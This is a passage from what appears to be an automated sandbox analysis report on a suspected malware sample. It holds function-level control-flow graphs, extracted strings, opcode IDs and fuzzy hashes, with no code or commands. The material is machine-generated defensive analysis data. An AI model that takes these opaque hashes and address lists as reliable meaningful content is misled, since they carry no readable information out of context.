                                                                                                                control_flow_graph 130 69230e0-6923101 131 6923103-6923106 130->131 132 6923108-6923127 131->132 133 692312c-692312f 131->133 132->133 134 69238d0-69238d2 133->134 135 6923135-6923154 133->135 137 69238d4 134->137 138 69238d9-69238dc 134->138 143 6923156-6923159 135->143 144 692316d-6923177 135->144 137->138 138->131 140 69238e2-69238eb 138->140 143->144 145 692315b-692316b 143->145 147 692317d-692318c 144->147 145->147 256 692318e call 6923900 147->256 257 692318e call 69238f8 147->257 149 6923193-6923198 150 69231a5-6923482 149->150 151 692319a-69231a0 149->151 172 69238c2-69238cf 150->172 173 6923488-6923537 150->173 151->140 182 6923560 173->182 183 6923539-692355e 173->183 185 6923569-692357c 182->185 183->185 187 6923582-69235a4 185->187 188 69238a9-69238b5 185->188 187->188 191 69235aa-69235b4 187->191 188->173 189 69238bb 188->189 189->172 191->188 192 69235ba-69235c5 191->192 192->188 193 69235cb-69236a1 192->193 205 69236a3-69236a5 193->205 206 69236af-69236df 193->206 205->206 210 69236e1-69236e3 206->210 211 69236ed-69236f9 206->211 210->211 212 69236fb-69236ff 211->212 213 6923759-692375d 211->213 212->213 216 6923701-692372b 212->216 214 6923763-692379f 213->214 215 692389a-69238a3 213->215 226 69237a1-69237a3 214->226 227 69237ad-69237bb 214->227 215->188 215->193 223 6923739-6923756 216->223 224 692372d-692372f 216->224 223->213 224->223 226->227 230 69237d2-69237dd 227->230 231 69237bd-69237c8 227->231 235 69237f5-6923806 230->235 236 69237df-69237e5 230->236 231->230 234 69237ca 231->234 234->230 240 6923808-692380e 235->240 241 692381e-692382a 235->241 237 69237e7 236->237 238 69237e9-69237eb 236->238 237->235 238->235 242 6923812-6923814 240->242 243 6923810 240->243 245 6923842-6923893 241->245 246 692382c-6923832 241->246 242->241 243->241 245->215 247 6923836-6923838 246->247 248 6923834 246->248 247->245 248->245 256->149 257->149
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.4170944844.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_6920000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                • API String ID: 0-2392861976
                                                                                                                • Opcode ID: 0bae8707e81f958d175f282cb2ec00eae0dbb9fd5b3cc45f04d398d493b13929
                                                                                                                • Instruction ID: 476ea3a952d020e1e54fdb8d216293e0291757f1607687c1b3901a69f9c69e80
                                                                                                                • Opcode Fuzzy Hash: 0bae8707e81f958d175f282cb2ec00eae0dbb9fd5b3cc45f04d398d493b13929
                                                                                                                • Instruction Fuzzy Hash: 4C321031E1071A8FCB54EF75D85459DB7B5BFC9300F20C6AAD409AB258EB30AE85CB91
                                                                                                                Function 06927DD8 Relevance: 3.0, Strings: 2, Instructions: 473COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1417 6927dd8-6927df6 1419 6927df8-6927dfb 1417->1419 1420 6927e1c-6927e1f 1419->1420 1421 6927dfd-6927e17 1419->1421 1422 6927e21-6927e2b 1420->1422 1423 6927e2c-6927e2f 1420->1423 1421->1420 1424 6927e31-6927e3f 1423->1424 1425 6927e46-6927e49 1423->1425 1433 6927e41 1424->1433 1434 6927e7e-6927e94 1424->1434 1427 6927e4b-6927e67 1425->1427 1428 6927e6c-6927e6e 1425->1428 1427->1428 1430 6927e70 1428->1430 1431 6927e75-6927e78 1428->1431 1430->1431 1431->1419 1431->1434 1433->1425 1438 6927e9a-6927ea3 1434->1438 1439 69280af-69280b9 1434->1439 1440 69280ba-69280c4 1438->1440 1441 6927ea9-6927ec6 1438->1441 1444 69280c6-69280cc 1440->1444 1445 6928115-692811b 1440->1445 1452 692809c-69280a9 1441->1452 1453 6927ecc-6927ef4 1441->1453 1449 69280ce 1444->1449 1450 69280dc 1444->1450 1446 692811f-6928121 1445->1446 1447 692811d 1445->1447 1451 692812b-6928132 1446->1451 1447->1451 1454 69280d0-69280d5 1449->1454 1455 69280d6-69280db 1449->1455 1456 6928096 1450->1456 1457 69280de-69280ef 1450->1457 1459 6928143 1451->1459 1460 6928134-6928141 1451->1460 1452->1438 1452->1439 1453->1452 1458 6927efa-6927f03 1453->1458 1454->1455 1455->1450 1456->1452 1456->1458 1461 69280f1-69280f4 1457->1461 1458->1440 1466 6927f09-6927f25 1458->1466 1465 6928148-692814a 1459->1465 1460->1465 1462 69281a7-69281aa 1461->1462 1463 69280fa-6928106 1461->1463 1467 69281b0-69281bf 1462->1467 1468 69283d6-69283d9 1462->1468 1471 6928111-6928113 1463->1471 1469 6928161-692819a 1465->1469 1470 692814c-692814f 1465->1470 1481 692808a-6928093 1466->1481 1482 6927f2b-6927f55 1466->1482 1483 69281c1-69281dc 1467->1483 1484 69281de-6928219 1467->1484 1472 69283db-69283f7 1468->1472 1473 69283fc-69283fe 1468->1473 1469->1467 1503 692819c-69281a6 1469->1503 1475 692840e-6928417 1470->1475 1471->1445 1471->1451 1472->1473 1477 6928400 1473->1477 1478 6928405-6928408 1473->1478 1477->1478 1478->1461 1478->1475 1481->1456 1504 6928080-6928085 1482->1504 1505 6927f5b-6927f83 1482->1505 1483->1484 1491 69283aa-69283c0 1484->1491 1492 692821f-6928230 1484->1492 1491->1468 1501 6928236-6928253 1492->1501 1502 6928395-69283a4 1492->1502 1501->1502 1512 6928259-692834f call 69265f8 1501->1512 1502->1491 1502->1492 1504->1481 1505->1504 1513 6927f89-6927fb7 1505->1513 1558 6928351-692835b 1512->1558 1559 692835d 1512->1559 1513->1504 1518 6927fbd-6927fc6 1513->1518 1518->1504 1520 6927fcc-6927ffe 1518->1520 1527 6928000-6928004 1520->1527 1528 6928009-6928025 1520->1528 1527->1504 1530 6928006 1527->1530 1528->1481 1531 6928027-692807e call 69265f8 1528->1531 1530->1528 1531->1481 1560 6928362-6928364 1558->1560 1559->1560 1560->1502 1561 6928366-692836b 1560->1561 1562 6928379 1561->1562 1563 692836d-6928377 1561->1563 1564 692837e-6928380 1562->1564 1563->1564 1564->1502 1565 6928382-692838e 1564->1565 1565->1502
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.4170944844.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_6920000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $^q$$^q
                                                                                                                • API String ID: 0-355816377
                                                                                                                • Opcode ID: a6f7e616c1ee6c90de3baa4624d372fd8216998a4187c15083204704e04000fe
                                                                                                                • Instruction ID: e18f47ccd25c76c535d6aee51ece5e6235b1db0ceba389ef1e5aa3557a2c06be
                                                                                                                • Opcode Fuzzy Hash: a6f7e616c1ee6c90de3baa4624d372fd8216998a4187c15083204704e04000fe
                                                                                                                • Instruction Fuzzy Hash: 6002AF30B002168FDB54DB68D5547AEB7E6FF84314F248929D415DB798DB31EC86CB81
                                                                                                                Function 06926648 Relevance: .8, Instructions: 823COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.4170944844.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_6920000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: d6f5c567a84ece8fff97bd8ca2614706031c03b62c782ce82acb7abaaa40bccb
                                                                                                                • Instruction ID: f4b3fb5edf1811c0f5460877b1fbed7b4dd9f50739c11abba2d6a689f93baff8
                                                                                                                • Opcode Fuzzy Hash: d6f5c567a84ece8fff97bd8ca2614706031c03b62c782ce82acb7abaaa40bccb
                                                                                                                • Instruction Fuzzy Hash: 7462C134B002168FDB54DB68D584BADBBF6EF84314F248469E415EBB58DB31ED46CB80
                                                                                                                Function 0692C1E8 Relevance: .6, Instructions: 645COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.4170944844.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_6920000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 68e1163c63c014f7c97a2c85a6337311a92b6cc8df660f2b21b5db7e11b6cd89
                                                                                                                • Instruction ID: 3f9e47d63a5c7aeedb8ee2774757d9e954ca9aef1ca213280474c49793d6da52
                                                                                                                • Opcode Fuzzy Hash: 68e1163c63c014f7c97a2c85a6337311a92b6cc8df660f2b21b5db7e11b6cd89
                                                                                                                • Instruction Fuzzy Hash: A232A334B00216CFDB94DB68D884BAEB7B6FB88314F248525D506EB758DB31EC46CB91
                                                                                                                Function 06925628 Relevance: .6, Instructions: 594COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.4170944844.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_6920000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 43d7b410363e2744a02f20a7dfbe81626d01853ffad73810aba2eaef5fa88b1e
                                                                                                                • Instruction ID: 00bc968607253ff246f618f43b4644e28454e4107de32194378c39c001332ef1
                                                                                                                • Opcode Fuzzy Hash: 43d7b410363e2744a02f20a7dfbe81626d01853ffad73810aba2eaef5fa88b1e
                                                                                                                • Instruction Fuzzy Hash: 2D12F375F002268BDB24DB64D8846AEB7BAEF85320F25843AD859DB748DB34DC41CB91
                                                                                                                Function 0692B282 Relevance: .6, Instructions: 565COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.4170944844.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_6920000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 7d7911244c8c7a3a41f205937b3cd758a26bba92d2c9e1a79627ec0cc6834d59
                                                                                                                • Instruction ID: b6403d41ccaf782a3dfdb2e4e952a9c3504a8641745b7ba52f92d57147ca4dfd
                                                                                                                • Opcode Fuzzy Hash: 7d7911244c8c7a3a41f205937b3cd758a26bba92d2c9e1a79627ec0cc6834d59
                                                                                                                • Instruction Fuzzy Hash: 50225D34E1021A8FDF64DB68C4807ADB7FAFB45318F248825E419EB79DCA35DC858B91
                                                                                                                Function 0692AD28 Relevance: 10.4, Strings: 8, Instructions: 401COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 0 692ad28-692ad46 2 692ad48-692ad4b 0->2 3 692ad5f-692ad62 2->3 4 692ad4d-692ad5a 2->4 5 692ad64-692ad69 3->5 6 692ad6c-692ad6f 3->6 4->3 5->6 8 692af45-692af4e 6->8 9 692ad75-692ad78 6->9 12 692add0-692add9 8->12 13 692af54-692af5e 8->13 10 692ad7a-692ad96 9->10 11 692ad9b-692ad9e 9->11 10->11 14 692ada0-692ada9 11->14 15 692adae-692adb1 11->15 16 692af5f-692af71 12->16 17 692addf-692ade3 12->17 14->15 19 692adb3-692adc6 15->19 20 692adcb-692adce 15->20 33 692af73-692af96 16->33 34 692aefd 16->34 21 692ade8-692adeb 17->21 19->20 20->12 20->21 23 692adfc-692adfe 21->23 24 692aded-692adf1 21->24 27 692ae00 23->27 28 692ae05-692ae08 23->28 24->13 25 692adf7 24->25 25->23 27->28 28->2 32 692ae0e-692ae32 28->32 48 692af42 32->48 49 692ae38-692ae47 32->49 36 692af98-692af9b 33->36 35 692aefe-692af00 34->35 38 692af0a-692af3b 35->38 39 692afa1-692afdc 36->39 40 692b204-692b207 36->40 38->48 53 692afe2-692afee 39->53 54 692b1cf-692b1e2 39->54 42 692b214-692b217 40->42 43 692b209-692b213 40->43 44 692b228-692b22b 42->44 45 692b219-692b21d 42->45 51 692b23a-692b23d 44->51 52 692b22d call 692b282 44->52 45->39 50 692b223 45->50 48->8 62 692ae49-692ae4f 49->62 63 692ae5f-692ae9a call 69265f8 49->63 50->44 55 692b260-692b262 51->55 56 692b23f-692b25b 51->56 60 692b233-692b235 52->60 68 692aff0-692b009 53->68 69 692b00e-692b052 53->69 59 692b1e4-692b1e5 54->59 64 692b264 55->64 65 692b269-692b26c 55->65 56->55 59->40 60->51 71 692ae53-692ae55 62->71 72 692ae51 62->72 88 692aeb2-692aec9 63->88 89 692ae9c-692aea2 63->89 64->65 65->36 66 692b272-692b27c 65->66 68->59 90 692b054-692b066 69->90 91 692b06e-692b0ad 69->91 71->63 72->63 100 692aee1-692aef2 88->100 101 692aecb-692aed1 88->101 92 692aea6-692aea8 89->92 93 692aea4 89->93 90->91 97 692b0b3-692b18e call 69265f8 91->97 98 692b194-692b1a9 91->98 92->88 93->88 97->98 98->54 100->38 109 692aef4-692aefa 100->109 104 692aed3 101->104 105 692aed5-692aed7 101->105 104->100 105->100 109->35 111 692aefc 109->111 111->38
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.4170944844.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_6920000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                • API String ID: 0-3823777903
                                                                                                                • Opcode ID: 286f69668c89096f6d6a8ca8a766623cc02d433a9b998179c4ce19dfc871f69c
                                                                                                                • Instruction ID: e65c61cc3d8f95faf79ad455eaeaf2449b91b3b718373f910fe6799b26c7937c
                                                                                                                • Opcode Fuzzy Hash: 286f69668c89096f6d6a8ca8a766623cc02d433a9b998179c4ce19dfc871f69c
                                                                                                                • Instruction Fuzzy Hash: A1E18F31E1031A8FDB59DF68D4846AEB7F6EF85214F208929D406EB758DB34DC86CB81
                                                                                                                Function 0692B6A0 Relevance: 8.0, Strings: 6, Instructions: 472COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 258 692b6a0-692b6c2 259 692b6c4-692b6c7 258->259 260 692b6d7-692b6da 259->260 261 692b6c9-692b6d2 259->261 262 692b701-692b704 260->262 263 692b6dc-692b6e0 260->263 261->260 264 692b711-692b714 262->264 265 692b706-692b70c 262->265 266 692b6e6-692b6f6 263->266 267 692ba4b-692ba86 263->267 268 692b716-692b719 264->268 269 692b71e-692b721 264->269 265->264 271 692b9c1-692b9c2 266->271 274 692b6fc 266->274 275 692ba88-692ba8b 267->275 268->269 269->271 272 692b727-692b72a 269->272 278 692b9c7-692b9ca 271->278 276 692b734-692b737 272->276 277 692b72c-692b731 272->277 274->262 279 692baae-692bab1 275->279 280 692ba8d-692baa9 275->280 281 692b739-692b73d 276->281 282 692b74e-692b751 276->282 277->276 283 692ba2e-692ba30 278->283 284 692b9cc-692ba29 call 69265f8 278->284 286 692bab7-692badf 279->286 287 692bd1d-692bd1f 279->287 280->279 281->267 285 692b743-692b749 281->285 288 692b753-692b75a 282->288 289 692b765-692b768 282->289 290 692ba32 283->290 291 692ba37-692ba3a 283->291 284->283 285->282 335 692bae1-692bae4 286->335 336 692bae9-692bb2d 286->336 295 692bd21 287->295 296 692bd26-692bd29 287->296 297 692b873-692b87c 288->297 298 692b760 288->298 299 692b76a-692b76e 289->299 300 692b77f-692b782 289->300 290->291 291->259 293 692ba40-692ba4a 291->293 295->296 296->275 306 692bd2f-692bd38 296->306 303 692b881-692b884 297->303 298->289 299->267 301 692b774-692b77a 299->301 304 692b7c0-692b7c3 300->304 305 692b784-692b799 300->305 301->300 309 692b886-692b88a 303->309 310 692b89b-692b89e 303->310 311 692b7d3-692b7d6 304->311 312 692b7c5-692b7ce 304->312 305->267 324 692b79f-692b7bb 305->324 309->267 315 692b890-692b896 309->315 317 692b8a0-692b8a3 310->317 318 692b8aa-692b8ad 310->318 319 692b7d8-692b7dc 311->319 320 692b7fd-692b800 311->320 312->311 315->310 325 692b844-692b847 317->325 326 692b8a5 317->326 327 692b8b4-692b8b7 318->327 328 692b8af-692b8b1 318->328 319->267 329 692b7e2-692b7f2 319->329 321 692b802-692b80b 320->321 322 692b810-692b813 320->322 321->322 322->271 331 692b819-692b81c 322->331 324->304 325->267 332 692b84d-692b854 325->332 326->318 333 692b8ca-692b8cd 327->333 334 692b8b9-692b8c5 327->334 328->327 329->263 351 692b7f8 329->351 337 692b81e-692b83a 331->337 338 692b83f-692b842 331->338 341 692b859-692b85c 332->341 343 692b8f4-692b8f7 333->343 344 692b8cf-692b8d3 333->344 334->333 335->306 377 692bd12-692bd1c 336->377 378 692bb33-692bb3c 336->378 337->338 338->325 338->341 348 692b86e-692b871 341->348 349 692b85e 341->349 346 692b901-692b904 343->346 347 692b8f9-692b8fc 343->347 344->267 345 692b8d9-692b8e9 344->345 345->319 360 692b8ef 345->360 346->271 354 692b90a-692b90d 346->354 347->346 348->297 348->303 359 692b866-692b869 349->359 351->320 357 692b923-692b926 354->357 358 692b90f-692b918 354->358 365 692b965-692b968 357->365 366 692b928-692b93d 357->366 363 692b9a1-692b9aa 358->363 364 692b91e 358->364 359->348 360->343 363->267 369 692b9b0-692b9b7 363->369 364->357 365->317 368 692b96e-692b971 365->368 366->267 379 692b943-692b960 366->379 370 692b993-692b996 368->370 371 692b973-692b98e 368->371 373 692b9bc-692b9bf 369->373 370->358 376 692b99c-692b99f 370->376 371->370 373->271 373->278 376->363 376->373 381 692bb42-692bbae call 69265f8 378->381 382 692bd08-692bd0d 378->382 379->365 392 692bbb4-692bbb9 381->392 393 692bca8-692bcbd 381->393 382->377 395 692bbd5 392->395 396 692bbbb-692bbc1 392->396 393->382 399 692bbd7-692bbdd 395->399 397 692bbc3-692bbc5 396->397 398 692bbc7-692bbc9 396->398 400 692bbd3 397->400 398->400 401 692bbf2-692bbff 399->401 402 692bbdf-692bbe5 399->402 400->399 409 692bc01-692bc07 401->409 410 692bc17-692bc24 401->410 403 692bc93-692bca2 402->403 404 692bbeb 402->404 403->392 403->393 404->401 405 692bc26-692bc33 404->405 406 692bc5a-692bc67 404->406 418 692bc35-692bc3b 405->418 419 692bc4b-692bc58 405->419 415 692bc69-692bc6f 406->415 416 692bc7f-692bc8c 406->416 411 692bc0b-692bc0d 409->411 412 692bc09 409->412 410->403 411->410 412->410 420 692bc73-692bc75 415->420 421 692bc71 415->421 416->403 422 692bc3f-692bc41 418->422 423 692bc3d 418->423 419->403 420->416 421->416 422->419 423->419
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.4170944844.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_6920000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                • API String ID: 0-2392861976
                                                                                                                • Opcode ID: cce743016355765ab5bdfdab06455464fe45e12ad2cddb8fa5adb03590bfc9ac
                                                                                                                • Instruction ID: 95e4755161afac0627147b72f5ab9e1694cf3bc43f2767e26cbe6e418ee65ef3
                                                                                                                • Opcode Fuzzy Hash: cce743016355765ab5bdfdab06455464fe45e12ad2cddb8fa5adb03590bfc9ac
                                                                                                                • Instruction Fuzzy Hash: C2027B30E1022A8FDF64DB68D4846ADB7F6EB45318F24892AD409DB64DDB30DC85CB91
                                                                                                                Function 069291A0 Relevance: 5.2, Strings: 4, Instructions: 231COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 426 69291a0-69291c5 428 69291c7-69291ca 426->428 429 69291f0-69291f3 428->429 430 69291cc-69291eb 428->430 431 6929ab3-6929ab5 429->431 432 69291f9-692920e 429->432 430->429 434 6929ab7 431->434 435 6929abc-6929abf 431->435 439 6929210-6929216 432->439 440 6929226-692923c 432->440 434->435 435->428 437 6929ac5-6929acf 435->437 441 692921a-692921c 439->441 442 6929218 439->442 444 6929247-6929249 440->444 441->440 442->440 445 6929261-69292d2 444->445 446 692924b-6929251 444->446 457 69292d4-69292f7 445->457 458 69292fe-692931a 445->458 447 6929253 446->447 448 6929255-6929257 446->448 447->445 448->445 457->458 463 6929346-6929361 458->463 464 692931c-692933f 458->464 469 6929363-6929385 463->469 470 692938c-69293a7 463->470 464->463 469->470 475 69293d2-69293dc 470->475 476 69293a9-69293cb 470->476 477 69293de-69293e7 475->477 478 69293ec-6929466 475->478 476->475 477->437 484 69294b3-69294c8 478->484 485 6929468-6929486 478->485 484->431 489 69294a2-69294b1 485->489 490 6929488-6929497 485->490 489->484 489->485 490->489
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.4170944844.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_6920000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $^q$$^q$$^q$$^q
                                                                                                                • API String ID: 0-2125118731
                                                                                                                • Opcode ID: 72fdd960fd29c64786fce4dbf6cdbed5f53d8e5c63cf6afd8d8497750f48cf62
                                                                                                                • Instruction ID: 30e9a92003d430247f668e6c3b0fec33b355c3887fe4705b0796770340868ea6
                                                                                                                • Opcode Fuzzy Hash: 72fdd960fd29c64786fce4dbf6cdbed5f53d8e5c63cf6afd8d8497750f48cf62
                                                                                                                • Instruction Fuzzy Hash: 8E916130F1021A8FDB54DB65D9507AEB7FABFC9204F208569C809EB748EB70DD468B91
                                                                                                                Function 0692CFA8 Relevance: 4.5, Strings: 3, Instructions: 799COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 493 692cfa8-692cfc3 495 692cfc5-692cfc8 493->495 496 692d011-692d014 495->496 497 692cfca-692d00c 495->497 498 692d031-692d034 496->498 499 692d016-692d02c 496->499 497->496 500 692d036-692d078 498->500 501 692d07d-692d080 498->501 499->498 500->501 503 692d082-692d084 501->503 504 692d08f-692d092 501->504 508 692d08a 503->508 509 692d48d 503->509 510 692d094-692d0a3 504->510 511 692d0db-692d0de 504->511 508->504 517 692d490-692d49c 509->517 512 692d0b2-692d0be 510->512 513 692d0a5-692d0aa 510->513 514 692d0e0-692d0e5 511->514 515 692d0e8-692d0eb 511->515 520 692d9c1-692d9d6 512->520 521 692d0c4-692d0d6 512->521 513->512 514->515 524 692d134-692d137 515->524 525 692d0ed-692d12f 515->525 518 692d4a2-692d78f 517->518 519 692d18e-692d19d 517->519 708 692d9b6-692d9c0 518->708 709 692d795-692d79b 518->709 526 692d19f-692d1a4 519->526 527 692d1ac-692d1b8 519->527 540 692d9d8-692d9dd 520->540 541 692d9de-692d9f6 520->541 521->511 528 692d180-692d183 524->528 529 692d139-692d17b 524->529 525->524 526->527 527->520 533 692d1be-692d1d0 527->533 528->517 530 692d189-692d18c 528->530 529->528 530->519 538 692d1d5-692d1d8 530->538 533->538 546 692d221-692d224 538->546 547 692d1da-692d21c 538->547 540->541 549 692d9f8-692d9fb 541->549 552 692d226-692d268 546->552 553 692d26d-692d270 546->553 547->546 550 692da0a-692da0d 549->550 551 692d9fd call 692db15 549->551 557 692da40-692da43 550->557 558 692da0f-692da3b 550->558 563 692da03-692da05 551->563 552->553 555 692d272-692d2b4 553->555 556 692d2b9-692d2bc 553->556 555->556 568 692d305-692d308 556->568 569 692d2be-692d300 556->569 564 692da66-692da68 557->564 565 692da45-692da61 557->565 558->557 563->550 575 692da6a 564->575 576 692da6f-692da72 564->576 565->564 573 692d313-692d316 568->573 574 692d30a-692d30c 568->574 569->568 583 692d318-692d334 573->583 584 692d339-692d33b 573->584 581 692d34b-692d354 574->581 582 692d30e 574->582 575->576 576->549 586 692da74-692da83 576->586 590 692d363-692d36f 581->590 591 692d356-692d35b 581->591 582->573 583->584 587 692d342-692d345 584->587 588 692d33d 584->588 604 692da85-692dae8 call 69265f8 586->604 605 692daea-692daff 586->605 587->495 587->581 588->587 595 692d480-692d485 590->595 596 692d375-692d389 590->596 591->590 595->509 596->509 615 692d38f-692d3a1 596->615 604->605 626 692d3a3-692d3a9 615->626 627 692d3c5-692d3c7 615->627 631 692d3ab 626->631 632 692d3ad-692d3b9 626->632 629 692d3d1-692d3dd 627->629 640 692d3eb 629->640 641 692d3df-692d3e9 629->641 634 692d3bb-692d3c3 631->634 632->634 634->629 643 692d3f0-692d3f2 640->643 641->643 643->509 645 692d3f8-692d414 call 69265f8 643->645 655 692d423-692d42f 645->655 656 692d416-692d41b 645->656 655->595 657 692d431-692d47e 655->657 656->655 657->509 710 692d7aa-692d7b3 709->710 711 692d79d-692d7a2 709->711 710->520 712 692d7b9-692d7cc 710->712 711->710 714 692d7d2-692d7d8 712->714 715 692d9a6-692d9b0 712->715 716 692d7e7-692d7f0 714->716 717 692d7da-692d7df 714->717 715->708 715->709 716->520 718 692d7f6-692d817 716->718 717->716 721 692d826-692d82f 718->721 722 692d819-692d81e 718->722 721->520 723 692d835-692d852 721->723 722->721 723->715 726 692d858-692d85e 723->726 726->520 727 692d864-692d87d 726->727 729 692d883-692d8aa 727->729 730 692d999-692d9a0 727->730 729->520 733 692d8b0-692d8ba 729->733 730->715 730->726 733->520 734 692d8c0-692d8d7 733->734 736 692d8e6-692d901 734->736 737 692d8d9-692d8e4 734->737 736->730 742 692d907-692d920 call 69265f8 736->742 737->736 746 692d922-692d927 742->746 747 692d92f-692d938 742->747 746->747 747->520 748 692d93e-692d992 747->748 748->730
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.4170944844.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_6920000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $^q$$^q$$^q
                                                                                                                • API String ID: 0-831282457
                                                                                                                • Opcode ID: 9f61267a22db0ebe855df0ffb868190dcc302696e765948698eb4c0ba58132f3
                                                                                                                • Instruction ID: 654729c0f05baf8f7ef8691b6e47db955733248d377447185ed340b50af5cb16
                                                                                                                • Opcode Fuzzy Hash: 9f61267a22db0ebe855df0ffb868190dcc302696e765948698eb4c0ba58132f3
                                                                                                                • Instruction Fuzzy Hash: 37623E30A002168FCB55EB68D590A5DB7F2FF84314B208A69D019DF76DDB71ED8ACB80
                                                                                                                Function 06924BF0 Relevance: 3.9, Strings: 3, Instructions: 186COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 756 6924bf0-6924c14 757 6924c16-6924c19 756->757 758 69252f8-69252fb 757->758 759 6924c1f-6924d17 757->759 760 692531c-692531e 758->760 761 69252fd-6925317 758->761 779 6924d9a-6924da1 759->779 780 6924d1d-6924d6a call 6925499 759->780 763 6925320 760->763 764 6925325-6925328 760->764 761->760 763->764 764->757 765 692532e-692533b 764->765 781 6924da7-6924e17 779->781 782 6924e25-6924e2e 779->782 793 6924d70-6924d8c 780->793 799 6924e22 781->799 800 6924e19 781->800 782->765 797 6924d97 793->797 798 6924d8e 793->798 797->779 798->797 799->782 800->799
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.4170944844.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_6920000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: fcq$XPcq$\Ocq
                                                                                                                • API String ID: 0-3575482020
                                                                                                                • Opcode ID: 19641d0a3cd30b9eff9ac514732ec3df6ed1eda0c04f42e5658354b6bffa8619
                                                                                                                • Instruction ID: f4674b0d7aa7541f65b959089f2f94e63343523102b49d7cc831940975ecdcb6
                                                                                                                • Opcode Fuzzy Hash: 19641d0a3cd30b9eff9ac514732ec3df6ed1eda0c04f42e5658354b6bffa8619
                                                                                                                • Instruction Fuzzy Hash: FD618130F102199FEB549FA4C8547AEBBF6FB88710F20852AD105EB398DB758C458B91
                                                                                                                Function 06929193 Relevance: 2.7, Strings: 2, Instructions: 171COMMON
                                                                                                                Download Yara Rule

